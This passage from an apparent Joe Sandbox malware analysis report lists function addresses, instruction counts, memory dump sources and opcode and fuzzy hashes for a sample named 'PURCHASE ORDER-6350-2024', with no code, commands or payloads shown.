                                                  • Instruction ID: e4a71ad2475213e510663825e0e9be2e7bb39b9331bc8989804f16a841adbc93
                                                  • Opcode Fuzzy Hash: e9f7291af3e63238792ec6c42de510d69a37008c38891589f57a4cb70b54dd1d
                                                  • Instruction Fuzzy Hash: 86318B74D05205CFEB80DFA8E2448ADBBF6FB09302B04A466E90AEB352D7349D45DF90
                                                  Function 06E1E011 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9febba8607ddd181a180cdb03901ac33a2b287d06223ba5c39479f88167c8f82
                                                  • Instruction ID: 64045eae6785c0e7bae145d42985dcbba8bdda729a2b21b1f8dcf66ea58ebf7b
                                                  • Opcode Fuzzy Hash: 9febba8607ddd181a180cdb03901ac33a2b287d06223ba5c39479f88167c8f82
                                                  • Instruction Fuzzy Hash: 6F314670A06305CFD790DFA8E2489ACBBFBFB09302B04A065F90A9B356DB309945DF40
                                                  Function 0100D4C4 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2047466175.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_100d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d567e4f19874a722e06c894e771bc73b20307d7b65e8ce066f15dc801f3111e
                                                  • Instruction ID: c5addf26a0a996b7f2b43a2492e4ec8d01b644118262e1af2d0f742a36264adb
                                                  • Opcode Fuzzy Hash: 9d567e4f19874a722e06c894e771bc73b20307d7b65e8ce066f15dc801f3111e
                                                  • Instruction Fuzzy Hash: 3121F471504240DFEB06DF98D980B2ABFA5FB88318F20C5A9ED490B296C336D456C7B2
                                                  Function 06E12F4B Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dae8c69b392a2530283287f51988733bfd1c672d9d967745e02cfb24673cf7ed
                                                  • Instruction ID: 922588606252d70d429f318c172631179c8920308cebd1e5d9c86d770702900d
                                                  • Opcode Fuzzy Hash: dae8c69b392a2530283287f51988733bfd1c672d9d967745e02cfb24673cf7ed
                                                  • Instruction Fuzzy Hash: F6213075B002058FCF54EF69C8948EEBBB5FF89200B508679D905EB355EB30AE45CBA0
                                                  Function 06E14AF8 Relevance: .1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44ee9d641e5253162405281e35f237276449b7d2962f5771f292bca39cef2985
                                                  • Instruction ID: e9521081e48eb9e5eace1e5639d81017b393dcd1ac1a0551997f7a86b392e56b
                                                  • Opcode Fuzzy Hash: 44ee9d641e5253162405281e35f237276449b7d2962f5771f292bca39cef2985
                                                  • Instruction Fuzzy Hash: 75210172B147108FEB154FB8A82927E3EE2ABC5201F044467E413CB3D5CE788C06D791
                                                  Function 0101D1D4 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2048125445.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_101d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9b4bd793ee6d221d43a5399f7661cbcf741e9b7ee4b39cd3d8481d81eb273ba
                                                  • Instruction ID: dc7368d5f012f21a236a67f9f6785433678dcae70540d4f52744040e11c95087
                                                  • Opcode Fuzzy Hash: e9b4bd793ee6d221d43a5399f7661cbcf741e9b7ee4b39cd3d8481d81eb273ba
                                                  • Instruction Fuzzy Hash: EC213771504200EFDB05DF98D5C8F26BBA5FB94324F20C6ADE9894B25AC33ED406CB61
                                                  Function 0101D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2048125445.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_101d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68d5ca88e6f38e6ee4bb33548faf53b1f0feb505a6e797e4011d6a01ac7f7e74
                                                  • Instruction ID: d2178069c1b021bfb609982189d0dc85de1f062d925b61652e30cc5c30eb2621
                                                  • Opcode Fuzzy Hash: 68d5ca88e6f38e6ee4bb33548faf53b1f0feb505a6e797e4011d6a01ac7f7e74
                                                  • Instruction Fuzzy Hash: 34212575504200DFCB16DFA8D988B16BFA5FB84314F20C5ADE9890B25AC33ED407CB61
                                                  Function 06E1C510 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 345a5775e869b2894d9ad093f93ab1f6bbae6d8009e3fd7554a017c368d7277f
                                                  • Instruction ID: c5967a2ce7f911377f7cf8afe9fb6382060ddda3ab8aef10bc849d41743528cc
                                                  • Opcode Fuzzy Hash: 345a5775e869b2894d9ad093f93ab1f6bbae6d8009e3fd7554a017c368d7277f
                                                  • Instruction Fuzzy Hash: 39219F74D49348CFCB55CF6AC8405DDBFF5AFCE200B24A1A6E405EB251D3788A45DB90
                                                  Function 06E101F2 Relevance: .1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf19f2083b4b026edad744fbbc46ce396303c226841a7f13a4563df26eb531bd
                                                  • Instruction ID: 75f3b944deb7842aa1609db659601db5e247543ba22f4e5dd79ef878fa8df1ea
                                                  • Opcode Fuzzy Hash: cf19f2083b4b026edad744fbbc46ce396303c226841a7f13a4563df26eb531bd
                                                  • Instruction Fuzzy Hash: E2213830A403058FEBA9DB29D8547BE7B52FFC0314F14982AE8034B6E5CF3889CAD641
                                                  Function 06E12F58 Relevance: .1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 84875719a1d0382bc541b44e099eabf19ad0a822a4331dd889dbb065d54fe71d
                                                  • Instruction ID: 7047b98ff4c018c6a3abd01c02075b40af4243f21a2342d2947016df3f0bdc1f
                                                  • Opcode Fuzzy Hash: 84875719a1d0382bc541b44e099eabf19ad0a822a4331dd889dbb065d54fe71d
                                                  • Instruction Fuzzy Hash: 25211075E002098FCF44EF69C8848EEF7B5FF89200B508669D915B7355EB30EA45CBA0
                                                  Function 06E10258 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e16641bac6de01608525d15c673b635e896eb17217d717b9879f7b3dcff12012
                                                  • Instruction ID: 6fe25e289fcc85820cdf22a04bf55d7d34efcd7deb6a3fcd852f76b77fabfdb6
                                                  • Opcode Fuzzy Hash: e16641bac6de01608525d15c673b635e896eb17217d717b9879f7b3dcff12012
                                                  • Instruction Fuzzy Hash: BC11E431A003018BE769DB6AE584B6FB79BEFC0314F04883AE4064B679CF74D4C6D650
                                                  Function 06E18188 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f79d4ce2a62729ebb10b0fae144823d61dae268f75c43d058c59fd3ce6890a8c
                                                  • Instruction ID: 608dda218cc46d31159193bcbade56fa57b0c4f3e559266fe76e321005ae3ba2
                                                  • Opcode Fuzzy Hash: f79d4ce2a62729ebb10b0fae144823d61dae268f75c43d058c59fd3ce6890a8c
                                                  • Instruction Fuzzy Hash: A521C072B14755CFE7958FADCD406BBBBB1BB85301F00552BA2269A281D2309958D392
                                                  Function 06E14B51 Relevance: .1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fdaa01a7e14b31089f6020d4cf9d19d37d270c48d85248160ba0186100ec4b50
                                                  • Instruction ID: 5b5a81ad82bc46e23c4519eb60841e000569aecf1268420831b5caf57e197e7a
                                                  • Opcode Fuzzy Hash: fdaa01a7e14b31089f6020d4cf9d19d37d270c48d85248160ba0186100ec4b50
                                                  • Instruction Fuzzy Hash: 3C11AF72B107008FEB555FB8982937E3AE2ABC9211F14846AE413CB3D5CE798C06DB91
                                                  Function 06E18179 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 432735a3a19a82048e544046d962b08636c78156e683d0f32461e56a6b5c62e0
                                                  • Instruction ID: 4a2010bdd1481581b20c827859236f705c6970bffc09f9eece8caf8b2fb8f84b
                                                  • Opcode Fuzzy Hash: 432735a3a19a82048e544046d962b08636c78156e683d0f32461e56a6b5c62e0
                                                  • Instruction Fuzzy Hash: 4811DC72A04614CFE7848FA9CD806ABB7B1FBC4300F00452BE626AA281E3309948D7D1
                                                  Function 06E1F4D0 Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8f833ae2d53d35543beb2c6a9f3ae81146111647c9c16134fc6f3b3b606378b
                                                  • Instruction ID: 09babb8716da68d0e005d97928a9161781da13da6e07f300c6a831c576a96a9f
                                                  • Opcode Fuzzy Hash: e8f833ae2d53d35543beb2c6a9f3ae81146111647c9c16134fc6f3b3b606378b
                                                  • Instruction Fuzzy Hash: 9C119E70F003198FDB989E7999146BF7AE6AF84760F14D529E8268B380EA30CD01E7D0
                                                  Function 06E1E0C2 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2d8bfedf35f8efb215f9a7f7cc81bc0e6d594867a1d7084e7cf82efc62c3fef
                                                  • Instruction ID: 6cc84dc52c33f177799fe9e538dce89031c7d5bb2ca5da7a3600b2953ef88f28
                                                  • Opcode Fuzzy Hash: b2d8bfedf35f8efb215f9a7f7cc81bc0e6d594867a1d7084e7cf82efc62c3fef
                                                  • Instruction Fuzzy Hash: 9C216034A40206DFD754DF68E854AACBBB7FB48200F208269DA0AE7315DF305D45CF50
                                                  Function 0100D4BF Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2047466175.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_100d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: 4569be0483008d39f7abc1a3d5c1f6bfd01d4b75a845c92660520655dc5a1ae8
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: 6011DF72404280CFDB02CF54D5C4B16BFB1FB88314F24C6A9DD490B296C336D45ACBA2
                                                  Function 0101D017 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2048125445.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_101d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                  • Instruction ID: a89a0ab8b905ab752b6795ee5d58e2b63e5c5f58495a698443d7e6be96a6e34e
                                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                  • Instruction Fuzzy Hash: D211D075504280CFDB12CF58D5C8B15FFA2FB44314F24C6AAE8494B65AC33BD44ACB62
                                                  Function 0101D1CF Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2048125445.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_101d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                  • Instruction ID: 1c9fbdd124d695883b599bbd054b0738d22a16933d4ea0c4fb503c35e90f963b
                                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                  • Instruction Fuzzy Hash: CC11BB75504280DFDB02CF58C5C8B15BFA1FB84224F24C6A9D8894B69AC33AD40ACB62
                                                  Function 06E125F7 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f59ff0b1b71015b985ee8c3fbd56533c7cf7f710088a5554388986c67a01fa3b
                                                  • Instruction ID: e7b7c76341ec30b5f80ab9f1ecc9b5f9bd776bd12b8632856013c7d5a7badf40
                                                  • Opcode Fuzzy Hash: f59ff0b1b71015b985ee8c3fbd56533c7cf7f710088a5554388986c67a01fa3b
                                                  • Instruction Fuzzy Hash: 9711CE30E0020E8FDB45EF68CC426EEBBB0EF48344F148528C855FB291DB749546DB90
                                                  Function 06E18290 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5bc275e11e65f61eaaed7c41e35e4ad14c31ff7ad549d4beea8a9392a7d995b
                                                  • Instruction ID: 4497c5179b9e15c188538b979e3dc8bba0e8f6090a5b743402519d2ec2edea0b
                                                  • Opcode Fuzzy Hash: e5bc275e11e65f61eaaed7c41e35e4ad14c31ff7ad549d4beea8a9392a7d995b
                                                  • Instruction Fuzzy Hash: B901D630B41B00DFE3584B299C04B7B7797AFC4B00F959466E6028F3A5CAB4D802C791
                                                  Function 06E10253 Relevance: .1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f1ada9151066b0c14adb7a9226c97488dd86a1ced3c9277af25b73a589586bf
                                                  • Instruction ID: 1bcf1cef9644d880eb8d554f381c8d5a9801bb74bec4bc8ba758c548d6bb03e3
                                                  • Opcode Fuzzy Hash: 5f1ada9151066b0c14adb7a9226c97488dd86a1ced3c9277af25b73a589586bf
                                                  • Instruction Fuzzy Hash: 2D012830A003018BE775DB6BE984BAFBB9BEFC0314F04842AE8464B5A9DF74D4C6D651
                                                  Function 06E1C8D9 Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a06a210a5af490201395296ab4849ee19db9e43600f89731ba888ebebd707db
                                                  • Instruction ID: 2baef8f188efd032e214ee1e04a7ba33d06aba6e20e830ac7033bb18239f02af
                                                  • Opcode Fuzzy Hash: 4a06a210a5af490201395296ab4849ee19db9e43600f89731ba888ebebd707db
                                                  • Instruction Fuzzy Hash: 9101B17098D344DFD740CB66C5519EDBFBD9B4A618B24A1A5D049DF212C7388A02FB90
                                                  Function 06E1D800 Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 225c8d76e1fecd30b88684a7da5f7c90ae849085cf5b34c3bf47d2d13aa5eb67
                                                  • Instruction ID: 094f87d56c3f07a3dfd77681424dbc2f8216818d38c361a4ebedb7a8c5c26edf
                                                  • Opcode Fuzzy Hash: 225c8d76e1fecd30b88684a7da5f7c90ae849085cf5b34c3bf47d2d13aa5eb67
                                                  • Instruction Fuzzy Hash: 29113074C052499FCB91DFA8C840AAEBFF5EF49301F109196E954E7341D3349B40DB90
                                                  Function 06E1C951 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27a2c412d72621c12dab1c32ebb866cf91c7a1facb5fd3fa2b389697084dc16d
                                                  • Instruction ID: 949ae0486d3e28ac6546d30db091c52d80a3099b999a65972d3e8479e5559bce
                                                  • Opcode Fuzzy Hash: 27a2c412d72621c12dab1c32ebb866cf91c7a1facb5fd3fa2b389697084dc16d
                                                  • Instruction Fuzzy Hash: 56018C34A09248DFD705CFA8C558AA9BFF5EF09200F259094E5099B362C734DE44EB40
                                                  Function 0100D745 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2047466175.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_100d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c60ad0301193bfa7a8d5f757d749bb44b598b5224d749935031f9520a02b97d8
                                                  • Instruction ID: 5b9626f1e9b12761ac0c2be642384a77b7bca502a41f747e0b919c136155127b
                                                  • Opcode Fuzzy Hash: c60ad0301193bfa7a8d5f757d749bb44b598b5224d749935031f9520a02b97d8
                                                  • Instruction Fuzzy Hash: F801FC3100438499F7124AD9CD84B5ABFDCFF45324F18C56AED4C0A2C6E2799440C771
                                                  Function 06E1E137 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5c277f456d762e1752f40f860d8c992c79319ed4c351b94dfe43fceab49f4dd8
                                                  • Instruction ID: 10fc152ad11db48df92ba7c14d071f6bfd80bd7dc7235a480367781c9593aab4
                                                  • Opcode Fuzzy Hash: 5c277f456d762e1752f40f860d8c992c79319ed4c351b94dfe43fceab49f4dd8
                                                  • Instruction Fuzzy Hash: 7C117C74A06304DFC750DFA8E6889ACBFFBFB09301B04A065E50A9F396DB309944DB40
                                                  Function 06E13600 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3decf4f2559a80ee613a60e8f4df41b9dc00f611f3b153d48a6ffa5c2cbab505
                                                  • Instruction ID: ef47bb2b0f46fa5841a65b972d6e6ce73179c84c8a045552f38e96534017f934
                                                  • Opcode Fuzzy Hash: 3decf4f2559a80ee613a60e8f4df41b9dc00f611f3b153d48a6ffa5c2cbab505
                                                  • Instruction Fuzzy Hash: 5301DE72D1420A9FDF50DF99D9459EFBBB8EB44360F104126E918B7240D770AE14DBA1
                                                  Function 06E12608 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e929a6f8acfddc1661edff5db30c1ab4d3c994357446d509145bcd45c4baa750
                                                  • Instruction ID: 1148d6b40cd7a237c405007ca56841cd5fb87785ffea6e3d05f6cb3eb7c18ef4
                                                  • Opcode Fuzzy Hash: e929a6f8acfddc1661edff5db30c1ab4d3c994357446d509145bcd45c4baa750
                                                  • Instruction Fuzzy Hash: 60016930E1020E8FDB44EB68CC026AEBBB0EF49344F048129D515FB390DBB8A655DB90
                                                  Function 06E1BF2F Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54365cf2692b7acca1a40b01c01889b01eb9f73aae8a524fa97f3d936c9b3e70
                                                  • Instruction ID: c17f9810e21a6d574def649557e94794194f8087a256e9737bbf62f3859d8ee8
                                                  • Opcode Fuzzy Hash: 54365cf2692b7acca1a40b01c01889b01eb9f73aae8a524fa97f3d936c9b3e70
                                                  • Instruction Fuzzy Hash: AE11C238A18218DFDB90DB94D9C49ECB7BAFB49310F24A181E419AB215D734A984DFA4
                                                  Function 06E1C548 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91ffbdb490dcebed40103d8f50049767a5331d53b0ea6c03bce4ab9397aa17b7
                                                  • Instruction ID: 62f7e21513574847b95a48bb8e2af5ede540668a385d39050b15c41337c11da7
                                                  • Opcode Fuzzy Hash: 91ffbdb490dcebed40103d8f50049767a5331d53b0ea6c03bce4ab9397aa17b7
                                                  • Instruction Fuzzy Hash: A411A2B4D05218CFCB48CFAAC9405EDBBF6BB8D301B249069D509EB355D7349941DF90
                                                  Function 06E135F3 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e845cb73bcb595b6845f5474f9b669bd55c4604cc2a0efcfad6bd899a3e228d
                                                  • Instruction ID: 0185cbc6005a16bc6ba2b1de2bd1e875db0153cf0a66d358f24734297bdb961a
                                                  • Opcode Fuzzy Hash: 2e845cb73bcb595b6845f5474f9b669bd55c4604cc2a0efcfad6bd899a3e228d
                                                  • Instruction Fuzzy Hash: B4014BB2D1425A9FCF11CFA8D851AEEBBB8EF09310F14413AE948B3241D6346A14DBA0
                                                  Function 06E1C960 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
